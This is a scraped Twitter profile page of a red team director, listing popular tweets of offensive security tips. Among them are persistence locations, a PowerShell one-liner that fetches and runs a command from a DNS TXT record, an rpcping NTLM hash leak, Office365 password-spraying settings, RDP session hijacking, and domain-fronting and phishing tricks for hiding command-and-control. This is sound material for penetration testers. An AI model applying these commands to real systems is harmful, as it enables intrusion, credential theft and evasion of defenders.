Vincent Yiu
@vysecurity
Followers
27,324
Following
204
Media
1,150
Statuses
32,127
Follow me for Cybersecurity #Thought #Leadership . Director Red Team. Help organizations safeguard their businesses from the bad guys.
Joined December 2014
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Will Still
• 123409 Tweets
Rio Grande do Sul
• 109632 Tweets
#MOONLIGHT_MVTeaser
• 94331 Tweets
プロフェッショナル
• 54135 Tweets
RPWP CONCEPT PHOTO 2
• 47000 Tweets
JOONGDUNK LOVE WORKPOINT
• 34776 Tweets
YOASOBI
• 28234 Tweets
青山先生
• 27947 Tweets
SDカード
• 24528 Tweets
عدنان البرش
• 15686 Tweets
#無責任でええじゃないかLOVE
• 14127 Tweets
VACHSS
• 13809 Tweets
排外主義的
• 13664 Tweets
Pinned Tweet
What on Earth do people do with 96GB RAM? Open like 32 instances of BloodHound neo4j databases?
225
40
556
Took all those "Red Team Tips" and stuck it onto one page: I'll update this page occasionally
#redteam
#adversarysimulation
#cyber
Also, I want to add that there's some duplicate numbering :( Ah well...
17
607
1K
Sent a PR to EDRs hook repository to visualize and quickly reference which APIs are hooked.
11
312
851
The fuck, what kind of vulnerability is CVE-2023–24044?
You can modify the host header so that it redirects to the attacker's domain instead. What is this bullshit? How did it even get a CVE?
67
100
849
Exploit CVE-2017-8759 without Macros or any interaction. Simply click on the infected file and boom code execution.
12
508
741
Common persistence mechanisms for Linux
/etc/rc.local
/etc/init.d/
/etc/profile
/etc/crontab
/etc/cron.d/
/etc/cron.hourly/
/etc/cron.daily/
/etc/cron.weekly/
/etc/cron.monthly/
/etc/cron.yearly/
Startup Applications
Systemd Services
.bashrc
.bash_profile
.bash_logout
11
127
646
Red Team 2.0 appears to become:
1) Give a machine on the internal network because phish fail.
2) Disable EDR because can't seem to bypass the EDR.
3) Can't figure out how to pivot network segment.
4) ...
Dude, why not just ask to be put on the core banking system?
43
66
468
Common persistence mechanisms for Windows.
1. Registry
2. Startup folder
3. Group Policy Objects
4. Task Scheduler
5. Windows Services
6. Scheduled Tasks
7. AutoRun registry keys
8. Security Support Provider
9. Userinit registry key
10. AppInit registry key.
9
99
453
Bypass Cloudflare using Workers:
Technically, couldn't you now use this technique to scan tons of websites for exposed content to the CloudFlare CDN?
5
157
453
Alternatives to the Whoami.exe command.
echo %USERNAME%
echo %USERDOMAIN%
systeminfo
wmic ComputerSystem get Username
net user %username%
query user
cd /users; dir
reg query “hkcu\volatile environment”
6
87
442
@LisaMayOfficial
@FightHaven
The store lost $100 in cash when the man stole the $100 bill from the register. However, when the man used the stolen $100 bill to buy $70 worth of goods and received $30 in change, the store did not lose any additional money.
So, the total amount the store lost was $100 due to…
61
2
415
Infosec tip: having the right Twitter feed saves you tens of thousands of USD in course fees. 😅
11
71
408
Life of a Red Teamer.
Client: "Is it you? Did you guys run calculator?"
9
48
392
Red Tip
#344
: Set HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0, to allow multiple sessions on a server per user. This is useful if you want to login to the jump-host, but that guy's just on all-day-long... 😶
5
131
394
Why is Red Teaming so undervalued? Is it just me? Blue teams are implementing controls that don't work like 80% of the time for tens of millions of dollars. Yet most orgs are skimping out on paying for Red Team who's going to tell you what went wrong?
69
38
311
As some people are asking about Domain Fronting and how to find domains, here's a list I've made: and another post
1
157
309
Why I quit Bug Bounty and I'm constantly being reminded:
Get paid fucking 10 USD for an Authentication Bypass + Remote Code Execution Chain, that can be used to attack their Domain Controllers.
20
17
307
Guess what, you know when you type 1 word into Chrome, and it goes off on a search? Windows also makes a NBNS + LLMNR request for that 1 word. Great.
8
127
299
Red Tip
#437
: Pwndrop is a customized web and webdav server that can be used to serve documents and payloads with a few extra features.
@kgretzky
made a fantastic GUI and its super easy to use! . Video at
#redteam
#cybersecurity
5
77
295
YOLO, I joined Cyber not even knowing how the TCP stack really worked, or how IP Networking worked. University was all text books.
OSCP just pushed me into more practical execution and understanding through testing / trial and error.
13
21
291
Red Tip
#345
: When placing Excel Macro backdoors into Excel startup, you don't have to name it Personal.xlsb, you can also call it a.txt. It'll still start up upon opening of Excel. 😊... Bonus point for sticking it into Roaming profile.
2
96
293
Trick to use any Cloudflare website to get your egress IP. Access the
https://<website>/cdn-cgi/trace,
and grep "ip".
4
54
290
Red Team: Shad0w, a post-exploitation framework designed to operate covertly on heavily monitored environments.
3
112
283
:D Who's interested in a way to get a shell once you have the target's low privileged Office365 credentials?
29
50
278
Table top scenario: There’s a breach and 30 employees got phished. All SOC AD accounts are locked out and we can’t get back in.
69
39
273
type C:\users\%username%\appdata\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
8
72
269
DevTunnels, blue are going to begin searching for . Get ready ahead of time and use domains like:
global.rel.tunnels.api.visualstudio\.com
tunnels-prod-rel-tm.trafficmanager\.net
*.app\.github.dev
6
91
269
Found a super useful tool today to easily identify IP ownership on a traceroute.
0
63
260
Neat command from Ippsec :D
find / -newermt "2021-02-12" -newermt "2021-02-19" -ls| grep -v ' /etc\| /var/lib\| /sys\| /proc\| /boot'
It finds files from when a box was created then finds stuff the author of a box planted for the CTF :D
5
54
258
If you wanted to extract ATT&CK Threat groups to Techniques, this script I mashed together works great for getting it into CSV before Matrixing:
2
81
254
Red Team Tip? Need random IP addresses to do something quick? has you covered.
7
58
251
Imagine trying to detect LOLBINs, then your sysadmins are like sticking commands like this into LOGON scripts.
11
55
252
Red tip
#325
: WPA2 PSK can be cracked on Hashcat too, just in case you were not aware. All you do is make cap2hccapx then convert the handshake CAP file to HCCAPX then crack it in Hashcat mode 2500 :)
6
102
249
Reverse Shell Generator. Looks like it'd be useful for things like
@hackthebox_eu
BattleGrounds.
4
100
249
Red Tip
#337
: Have a low privileged Office365 account? Pivot over to after logging in and you can access the Azure AD. If they're syncing AD you suddenly get to view all the groups. Also check out Azure CLI. From
@ustayready
's
@WWHackinFest
talk!
1
110
243
Red tip
#303
: Look for open S3 buckets using I found 1400 buckets in about 1 hour. Good practice to make sure your client isn’t vulnerable to such attacks and if In red team you might be able to use it to serve payload stages or create waterhole attacks
3
120
239
Red Tip
#435
: Found GitLab but no credentials? That pesky sign-in page is blocking you off? Try navigate to /explore or /explore/snippets to see if there's anything useful.
#Redteam
#GitLabSnippets
2
62
240
Red Tip
#421
: Do you know how to trivially & remotely hijack an
#RDP
session without prompt nor warning on user’s side using
#Microsoft
signed binary (no patch/multi-session) ?
qwinsta+mstsc shadowing is the answer ;) Details:
@kmkz_security
2
74
238
Red Tip
#343
: When working with Google Drive documents, if it asks you to request permission, you can try. However, you can also try sticking /pubhtml at the end to see if they've published a copy that you can view.
2
68
231
Just saw the 50th company running:
subfinder -d $1 | httpx | gospider | nuclei.
Calls it AI, next gen.
13
18
220
Red tip
#328
: Need to Spray Office365? Use . Tried and tested this tool and works really fast and well in Python. Just do --threads 3000 and --password Welcome1. As all operators know, you don't have time to be testing tools in the middle of a gig. :)
0
78
220
Red / Blue Team Tip: If you're still reading e-mail message headers using Notepad, you're doing it wrong. Check out Message Header Analyzer:
It'll save your eyes 🤯
#cyber
#redteam
#blueteam
#suspiciousemails
12
51
218
Getting started with Threat Hunting:
1) Install Splunk
2) Sysmon all the endpoints using GPO
3) Send all logs to Splunk using Sysmon TA
4) Run saved queries :D
13
64
212
Red Tip
#423
: Escalate privileges on a Windows system if you have any of the following privileges.
SeImpersonate, SeAssignPrimary, SeTcb, SeBackup, SeRestore, SeCreateToken, SeLoadDriver, SeTakeOwnership, SeDebug
@elc0rr3Km1n0s
#cyber
#redteam
1
50
208
Wtf time to create C2 channel using Find My instead of using GSM for the drop box.
1
59
208
Ransomware defense. Every EDR company telling people to install EDR but in reality their EDR probably won’t even detect AnyDesk. You should be red teaming instead.
21
29
198
Red Tip
#402
: Need to proxy Linux tools? Proxychains4. Need to proxy Windows tools like ADExplorer or Remote Desktop? Try out Proxycap, Proxifier.
#cyber
#operations
#redteam
4
77
201
Red Tip
#431
: Have access to DNS Admin, Backup Operators, Schema Admins etc?
@Cube0x0
explains how to exploit into further access .
@PyroTek3also
has also documentation over at
#cyber
#redteam
1
77
191
1. The cloud is just someone else’s computer.
2. When that someone tells you they can’t view your data, all they mean is they have a rule to say they shouldn’t. Rarely a technical control to prevent it.
8
54
191
Using CloudFlare for IP address filtering in Red Team Operations:
Wrote it up for reference, and because CloudFlare is pretty awesome. You can also play around with the other features! 🔥 (cc
@curi0usjack
,
@shantanukhande
)
#redteam
#cybersecurity
4
81
188
Red tip
#320
: List Chrome bookmarks with one line:
type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
Thank
@francisacer1
for the path to Bookmarks.bak :D
2
56
187
Red tip
#310
: SOC is looking for low user/access count new domains that haven't been seen before and you can't domain front due to RFC2616 proxy? When doing the phish, add invisible image links to your C2 domain so that multiple users will have loaded the C2 domain before use.
4
64
187
Red tips update: For all red tips so far, visit and follow and for live feeds you can follow my Twitter! :D
8
104
183
Just in case you need to leak a hash over a port other than TCP 445 you have "rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM"
0
77
176
A new update to the ATT&CK Group to Technique repository!
@msgeekuk
has given us a lot of fancy changes in the Spreadsheet, and we also have color coding. Get the repository at
4
79
178
OK, best payload initiation vectors. Eg. DOC Macro, Excel Macro, HTA, VBS, JS, SLK, What else...?
23
41
177
I've got to say but one of my favourite commands to date is: powershell Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DCNAME
5
46
176
[NEW POST] HAMMERTHROW: Rotate my domain. Automating the process of changing staging and beacon domains in
@armitagehacker
's CobaltStrike. This makes it more difficult for defenders to detect all domains in use.
#redteam
3
103
172
Red tip
#274
: Password cracking is hard. I love Top297Million-Probable, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! Share your ideas!
7
70
171
Given the feedback from some of the companies who run the products on the list, here’s a revamped version without certain products. Let’s hope everyone can learn to maximise coverage using multiple products or understand the scope of their EDR’s coverage. Cc
@MrUn1k0d3r
#redteam
5
76
172
ThreadStackSpoofer - a PoC for advanced in-memory evasion technique by
@mariuszbit
. Worth following his work as he releases a lot of PoC and tooling for the latest techniques and concepts! 👇Check it out here: 🤯
#redteam
#OST
1
73
173
How do you prevent a zero day exploit attack? You don't. You block the next step of the attack to minimise the impact of the zero day. If you have many layers of controls, it minimises the impact of the zero day. Good network segmentation and endpoint / server controls etc.
4
76
168
Send phish to 10 companies, get 30 shells, 7 minutes in. Shell overload is a big problem. Why’s no one talked about shell overload problems?
13
15
165
Red tip
#284
: Windows Credential Vault is often used to store saved passwords.
@_rastamouse
walks us through the decryption procedures required to make use of these credentials in his blog post at !
2
76
165
[NEW POST] For the
#RedTeam
who use CloudFront for Domain Fronting. Similar to Aliyun, set arbitrary host headers :) Check this out. As always, I confirm any techniques and findings using
@armitagehacker
Cobalt Strike. cc
@bluscreenofjeff
@001spartan
4
74
163
No need for IEX cc
@MDSecLabs
: powershell -ep bypass -nop -c "powershell . ((nslookup.exe -q=txt ))[5]"
5
99
161
0
72
163
Why I see myself as a hacker more than a developer. Part 1.
1) I write code that barely works, not factored, not optimized.
2) I write obfuscation better than I write code.
3) I still can't get a proper UI going.
4) My code achieves the task, only.
8
20
160
SUDO KILLER looks dope.
I can't wait to use it at some point in time :D
3
64
156
Red tip
#321
: Want to find out if the current network has an external exposed interface? Eg. Wireless networks? An easy way is to visit on port 22,80,443 for a quick idea. You might find that your current network has another way in!
4
57
157
New blog post on using Alibaba CDN for domain fronting, and some of it's benefits.
#redteam
#security
My examples use
@armitagehacker
's Cobalt Strike, but you can use any other C2 software.
1
85
148